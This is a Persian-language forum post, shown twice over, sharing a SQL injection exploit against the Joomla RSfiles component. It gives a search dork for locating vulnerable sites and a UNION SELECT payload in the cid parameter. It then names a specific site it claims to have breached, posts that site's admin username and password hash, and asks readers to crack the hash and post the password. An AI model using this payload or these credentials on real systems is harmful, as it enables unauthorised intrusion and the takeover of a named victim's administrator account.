سلام خدمت دوستان این باگ باگ جالبی هست و کار هم میده !!
[php]
************************************************** *****************************
# Title : Joomla Component RSfiles <= (cid) SQL injection Vulnerability
# Author : ByEge
# Contact : http://byege.blogspot.com
# Date : 18.03.2013
# S.Page : http://www.rsjoomla.com
# Dork : inurl:index.php?option=com_rsfiles
Vulnerability : ?option=com_rsfiles&view=files&layout=agreement&tm pl=component&cid=1())--
[[SQL Injection Test]]]
http://server/?option=com_rsfiles&view=files&layout=agreement&tm pl=component&cid=1/**/aNd/**/1=0/**/uNioN++sElecT+1,CONCAT_WS(CHAR(32,58,32),user(),da tabase(),version())--
[/php]
دوستان یک نمونه سایت براتون میزارم که user pass رو بدست اوردم البته پسورد هش هست که دوستان زحمت بکشن هش رو کرک کنند روش کرک و خود پس رو همین جا بزارن .
[php]
http://www.rolt.co.uk//index.php?option=com_rsfiles&view=files&layout=agr eement&tmpl=component&cid=1
user:admin
pass:cb2fbb76b10fa3617543a02e58b69959:BMkfeTKYzUAG nTb3M0bJrYF2iSOohLqH
[/php]
ببخشید دسترسی برای ایجاد موضوع تو بخش مربوطه رو نداشتم !
[php]
************************************************** *****************************
# Title : Joomla Component RSfiles <= (cid) SQL injection Vulnerability
# Author : ByEge
# Contact : http://byege.blogspot.com
# Date : 18.03.2013
# S.Page : http://www.rsjoomla.com
# Dork : inurl:index.php?option=com_rsfiles
Vulnerability : ?option=com_rsfiles&view=files&layout=agreement&tm pl=component&cid=1())--
[[SQL Injection Test]]]
http://server/?option=com_rsfiles&view=files&layout=agreement&tm pl=component&cid=1/**/aNd/**/1=0/**/uNioN++sElecT+1,CONCAT_WS(CHAR(32,58,32),user(),da tabase(),version())--
[/php]
دوستان یک نمونه سایت براتون میزارم که user pass رو بدست اوردم البته پسورد هش هست که دوستان زحمت بکشن هش رو کرک کنند روش کرک و خود پس رو همین جا بزارن .
[php]
http://www.rolt.co.uk//index.php?option=com_rsfiles&view=files&layout=agr eement&tmpl=component&cid=1
user:admin
pass:cb2fbb76b10fa3617543a02e58b69959:BMkfeTKYzUAG nTb3M0bJrYF2iSOohLqH
[/php]
ببخشید دسترسی برای ایجاد موضوع تو بخش مربوطه رو نداشتم !
نظر